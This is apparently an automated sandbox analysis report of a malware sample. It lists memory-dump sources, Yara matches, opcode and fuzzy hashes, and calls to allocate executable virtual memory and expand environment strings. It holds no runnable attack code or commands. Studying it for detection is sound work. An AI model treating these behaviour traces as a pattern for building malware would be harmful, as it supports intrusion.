                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: 01
                                              • API String ID: 292159236-3477152822
                                              • Opcode ID: 5b7f9c4f8180f5ebea96daf370ee695ebd2cc2de3fcf7e05343775afda963dee
                                              • Instruction ID: 95b4c88d5bc010d7edbabac85c5c32fb3d281e16f1180f0d40352898b5a9dece
                                              • Opcode Fuzzy Hash: 5b7f9c4f8180f5ebea96daf370ee695ebd2cc2de3fcf7e05343775afda963dee
                                              • Instruction Fuzzy Hash: 43D112B01083869FD724CF04C894B9FBBE1BB86348F148D2CE5E99B391D77599098F96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041BADE
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041BB39
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041BD7E
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041BDD9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: 01
                                              • API String ID: 292159236-3477152822
                                              • Opcode ID: fed2dc28b6cbed2a1ab562f7af2b107bbc30e3a60bc6d271f81b13037ac1232c
                                              • Instruction ID: 664c0559d8076d972d5a56e374875a1de3e0a82fa573013157e44d364f674d6d
                                              • Opcode Fuzzy Hash: fed2dc28b6cbed2a1ab562f7af2b107bbc30e3a60bc6d271f81b13037ac1232c
                                              • Instruction Fuzzy Hash: 3BD123B01083829FD724CF04C894B9FBBE1FB85348F148D2DE5E98B391D77999498B96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007171CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0071723E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: ,$@
                                              • API String ID: 292159236-1227015840
                                              • Opcode ID: ac3439721b39ca0e062e45c23e4720c439a7e4d0abd7daa180adecded1292a4d
                                              • Instruction ID: e5c55f7bff962cba1f368c126c4a31fc866c575e820cc71d38d6dacd95a3f7de
                                              • Opcode Fuzzy Hash: ac3439721b39ca0e062e45c23e4720c439a7e4d0abd7daa180adecded1292a4d
                                              • Instruction Fuzzy Hash: F6416CB11087049FD710DF18C845B5ABBF4FF85368F148A1CF5A89B2E0E7799948CB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: or]`$ql$uuMx$v|vs$~t~{
                                              • API String ID: 0-1582885218
                                              • Opcode ID: 868f65a298393c092045ad6b5e740a7d41dfa7cf2d3ed0caf4700d7c882c0fbc
                                              • Instruction ID: 7978ef47a0727b200c9dcb864821d2858674370588c0b8e011aae5bebeb44bd6
                                              • Opcode Fuzzy Hash: 868f65a298393c092045ad6b5e740a7d41dfa7cf2d3ed0caf4700d7c882c0fbc
                                              • Instruction Fuzzy Hash: D271BFB15083818FD724CF28C491B6ABBE2AFD6308F584A2DF5A58B392D735D805CB53
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FF2E2
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 006FF339
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FF3F8
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000010,00008000), ref: 006FF44B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 9f223972c6e00767f31f53eb7143541c46e9f4b68b12634d2ed7506813b22cfe
                                              • Instruction ID: 95e9ae32ece9e6ca1bf652ccd6d0cd215aa4d57dc14d79640cb1958a1bbfb7ef
                                              • Opcode Fuzzy Hash: 9f223972c6e00767f31f53eb7143541c46e9f4b68b12634d2ed7506813b22cfe
                                              • Instruction Fuzzy Hash: BFD1F0B25083558FE710CF18C881B6BBBE2EF95714F14892CF6998B391E775D809CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00717CEF
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00717D4C
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,900000C2,00000000,?,00003000,00000040), ref: 00717E0D
                                              • NtFreeVirtualMemory.NTDLL(000000FF,900000C2,00000010,00008000), ref: 00717E66
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 173c32154affdbdc667f6446fb9e2f64271c96d6fde4b8c3c79ed66e94f019e3
                                              • Instruction ID: 2630086d7b1a202b93c037fa051200fc4a7fcfedef2730c7ddcf8e36c2512d30
                                              • Opcode Fuzzy Hash: 173c32154affdbdc667f6446fb9e2f64271c96d6fde4b8c3c79ed66e94f019e3
                                              • Instruction Fuzzy Hash: 31B157752083059FD714CF18C880A6AB7F5EF88754F148A2CF9948B3A0D778E946CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 00437A88
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00437AE5
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,900000C2,00000000,?,00003000,00000040), ref: 00437BA6
                                              • NtFreeVirtualMemory.NTDLL(000000FF,900000C2,00000010,00008000), ref: 00437BFF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: fd219758d9db17cc94796abe45fd0d6473a22074745e6749ab2f388bb29d676e
                                              • Instruction ID: cd35143630c2b7208a231692c9bfede39d70e314533d5fdb885180932d4d8fe2
                                              • Opcode Fuzzy Hash: fd219758d9db17cc94796abe45fd0d6473a22074745e6749ab2f388bb29d676e
                                              • Instruction Fuzzy Hash: A3B159B52083059FD720CF18C880B2BB7E5FF89754F148A2DE9959B3A0D778E905CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 007125E3
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000000,00008000), ref: 00712636
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,0000BA00,00003000,00000040), ref: 00712787
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 007127DA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: bb9a09759b8c52a7af2f9d5a8e3ea93175dc5b911b8a386b5509ad4328e8e534
                                              • Instruction ID: 31cf8e52aa66d02072bedcd2a889bb5e8fabaf054375873a638d66ff706647f3
                                              • Opcode Fuzzy Hash: bb9a09759b8c52a7af2f9d5a8e3ea93175dc5b911b8a386b5509ad4328e8e534
                                              • Instruction Fuzzy Hash: 929169752083409FE710CF18C844B5BBBE5FB89718F148A1CF9A89B2D1D774D84ACB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007179CC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00717A2A
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,D2FF0000,00000000,?,00003000,00000040), ref: 00717AF1
                                              • NtFreeVirtualMemory.NTDLL(000000FF,000000B8,00000000,00008000), ref: 00717B4E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 4a0168ff795fabbc8994d38d6af19aed225ae0147579180104e460b07bb7a6ad
                                              • Instruction ID: 9656bec376d5d52a8b8c16b63fd42cee653e977c460326634b1163a357e3bde7
                                              • Opcode Fuzzy Hash: 4a0168ff795fabbc8994d38d6af19aed225ae0147579180104e460b07bb7a6ad
                                              • Instruction Fuzzy Hash: B381AB712083059FD714CF18C880B5FB7F5EF88364F148A2CF9989B2A0E7789949CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 00712910
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0071295E
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,0000BA00,00003000,00000040), ref: 00712A96
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 00712AE4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 3183d0fc1c45eb8ffbe76e0d2bf465086227915d5149b185099a8ad591cb09a2
                                              • Instruction ID: b1eb8f2431252905aa8dbb2dab682754c44aa75ecbbe9233ac93e724599cd9c3
                                              • Opcode Fuzzy Hash: 3183d0fc1c45eb8ffbe76e0d2bf465086227915d5149b185099a8ad591cb09a2
                                              • Instruction Fuzzy Hash: DB8168B52083409FE310CF18C854B5BBBE5FB85724F248A2CE9A89B3D1D775D849CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004326A9
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 004326F7
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,0000BA00,00003000,00000040), ref: 0043282F
                                              • NtFreeVirtualMemory.NTDLL(000000FF,00000000,00000010,00008000), ref: 0043287D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: b97c9c9b145aad2e1d9368271895e216e87d9cc9384d0ae90c19c4d28519d217
                                              • Instruction ID: b7602bd55606e6d13354845806596aa518dbb84f2c3c29a10939dc9f0e37411e
                                              • Opcode Fuzzy Hash: b97c9c9b145aad2e1d9368271895e216e87d9cc9384d0ae90c19c4d28519d217
                                              • Instruction Fuzzy Hash: 558178756083009FE304DF18C944B1BBBE5FB89728F144A2DE5A49B3D1D7B5D809CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006F84B6
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006F84FD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction ID: 6a6c65f2b1f035d31273ce257e4e1026b05e6aa1af8ce5676d83dd588ebe1fc3
                                              • Opcode Fuzzy Hash: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction Fuzzy Hash: 7F5167B51087059FE704CF14C844B6EB7E4FB89308F144A2CF6A99B3A0DB74D909CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041824F
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00418296
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction ID: ea426b73a6193aca508bd4f71ddd3128639f88ab0726b32ca3609f59bda8a89b
                                              • Opcode Fuzzy Hash: 8f1e51718da0f83a02f2f44deb78f8a3df6a609a11e9e7c5692b80009bb081c0
                                              • Instruction Fuzzy Hash: 155155B51087059FE704CF04C844B5FB7E4FB89708F144A2DF9A99B2A0DB78D9498B9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 006F6F46
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,?,00008000), ref: 006F6F90
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,000000B8,00003000,00000040), ref: 006F7036
                                              • NtFreeVirtualMemory.NTDLL(000000FF,5C3924FC,?,00008000), ref: 006F7080
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID:
                                              • API String ID: 292159236-0
                                              • Opcode ID: 7f5145cdc1ba7bdbf325bf54874c91c1703ebb6d8d5572ff1395ec8793542ebc
                                              • Instruction ID: 23e9831821634805336530c121043c9c276f2f994191521cca9c1300ce82275f
                                              • Opcode Fuzzy Hash: 7f5145cdc1ba7bdbf325bf54874c91c1703ebb6d8d5572ff1395ec8793542ebc
                                              • Instruction Fuzzy Hash: 784149B51087049FE710CF14C844B6EB7E9FB88318F544A2CF6A99B3A0D774D908CB9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: )$IDAT$IEND$IHDR
                                              • API String ID: 0-3181356877
                                              • Opcode ID: f4058fd5fcca487bb8e99b228029b2f7b0a1782982b118de500cbaa2cf4054f1
                                              • Instruction ID: 7986abfe6b5466d61ac6eb7023fde17ff5157d85e9bdc16f34276318d7a03306
                                              • Opcode Fuzzy Hash: f4058fd5fcca487bb8e99b228029b2f7b0a1782982b118de500cbaa2cf4054f1
                                              • Instruction Fuzzy Hash: 1F1213716093848FD718CF29C8907AA7BE2FF85304F15466CEA868B3D1D776D909CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 006FB5AD
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 006FB5DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: `a
                                              • API String ID: 237503144-512829590
                                              • Opcode ID: 2ba9c0707b692f4f07f3c48157f3a9eecaa5ad8444f655b7713eb7156d60c94c
                                              • Instruction ID: 403342e141f241663b22d3fa938e3c35de237d444b3622a0f40aea2f0d7b4cfc
                                              • Opcode Fuzzy Hash: 2ba9c0707b692f4f07f3c48157f3a9eecaa5ad8444f655b7713eb7156d60c94c
                                              • Instruction Fuzzy Hash: 5971CF706083818BE728CF14C8A1BABB7E2FFC5304F048A1CE9955B381D7B49945CB97
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041B346
                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041B374
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandStrings
                                              • String ID: `a
                                              • API String ID: 237503144-512829590
                                              • Opcode ID: f86cb4591fc71e74da725966c1eb0e60b94ca4f5965b5f3c60f3e3b5fd6e9612
                                              • Instruction ID: 211465a6f8bb4c712efb5c1327cce063fb9030e645e76492337cb801d03caa5d
                                              • Opcode Fuzzy Hash: f86cb4591fc71e74da725966c1eb0e60b94ca4f5965b5f3c60f3e3b5fd6e9612
                                              • Instruction Fuzzy Hash: 12719D716083518BE728CF15C8A1B9BB7E2EFC9308F048A1DE8995B381D7B49545CBD7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007173AC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 00717409
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 6996d07a353da892851f4c2cbdd3a313a6ee4d4a3484e03e6a3ef98ba35a13ce
                                              • Instruction ID: d4b4805395ae8d8ff768296fabd9fdb4a2ad0a654a73cc451117b1e10248ea7b
                                              • Opcode Fuzzy Hash: 6996d07a353da892851f4c2cbdd3a313a6ee4d4a3484e03e6a3ef98ba35a13ce
                                              • Instruction Fuzzy Hash: CF418AB20087009FD714CF18C844B5AB7F4FF85368F148A1DF9A89B2E0E3789948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 006FBA93
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 006FBAEB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: NM
                                              • API String ID: 292159236-659443033
                                              • Opcode ID: f17b37614a2649c84a47a7bd143c36d68b9802bcd3225b799024dfba8cbae39f
                                              • Instruction ID: 6606ebf5532e3b2811070104c4084099871a134da152e22303f61dcf4ec90430
                                              • Opcode Fuzzy Hash: f17b37614a2649c84a47a7bd143c36d68b9802bcd3225b799024dfba8cbae39f
                                              • Instruction Fuzzy Hash: 6E5101B41083809FD720CF04C894B9FBBE5BB85708F144A2DE5E59B391D7B49909CF9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,00000000,00000000,00000010,00003000,00000040), ref: 0041B82C
                                              • NtFreeVirtualMemory.NTDLL(000000FF,?,00000000,00008000), ref: 0041B884
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: NM
                                              • API String ID: 292159236-659443033
                                              • Opcode ID: e61b303816415c7f5f5d92e4ab71877ace8d6bab5c9632d1ce1da36c78d05f1f
                                              • Instruction ID: f00f4fd28a0e5576ffbbb8e6303699de98ce98a9013cd7b91c2115223f1c65f0
                                              • Opcode Fuzzy Hash: e61b303816415c7f5f5d92e4ab71877ace8d6bab5c9632d1ce1da36c78d05f1f
                                              • Instruction Fuzzy Hash: 4F5120B01083809FD320CF04C894B9BBBE5FB85748F104A2DE5E59B391D7B89949CF9A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 007178BC
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 0071790E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: @
                                              • API String ID: 292159236-2766056989
                                              • Opcode ID: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction ID: 424f7dd7e4b8ae21ccb66344d07ffdcc45de7ddd5f734b77d304416a936b5770
                                              • Opcode Fuzzy Hash: 2f6ba8cee97a2f9810962fc78690305e3b4e58b623afafa70e25634a7e200208
                                              • Instruction Fuzzy Hash: 3B412AB55083109FD710CF18C844B5BBBE4FB89368F008A2CF9A9A7390D374D948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0071760B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 0071766A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction ID: cb9549253748075528482061d222b18d17335014334564f61b93a7b29d20fa59
                                              • Opcode Fuzzy Hash: c37c6b5c451b38d6ae7fb4e42b3a4e5df3548462c2cec44560233b9523c4bb9e
                                              • Instruction Fuzzy Hash: 0A315075208314AFD714CF18CC44B5BB7E8EB89758F104A2CFAA89B2D0E7759948CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 0071773B
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 0071779A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814640419.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6e0000_20qMFnd9tO.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
                                              • Instruction ID: 588171135dccca9fee94043ac498771b7cc74f888117f70621e48832732106b0
                                              • Opcode Fuzzy Hash: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
                                              • Instruction Fuzzy Hash: 90316D75208704AFE714CF18CC84B5AB7E8EB85758F104A2CFAA49B2D0D7B59D48CB96
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,00000010,00003000,00000040), ref: 004374D4
                                              • NtFreeVirtualMemory.NTDLL(000000FF,0000BA00,00000000,00008000), ref: 00437533
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1814455489.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.1814455489.0000000000447000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_20qMFnd9tO.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$AllocateFree
                                              • String ID: $
                                              • API String ID: 292159236-3993045852
                                              • Opcode ID: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
                                              • Instruction ID: 412d602cbfcbcf5e118d5b7ea9dfba44e96f25c8408074ac52780fe9017936c2
                                              • Opcode Fuzzy Hash: bdb6a8228723a2d665ed6d9d506fb2c16468f78bb87a046c87a3f8281fd40b64
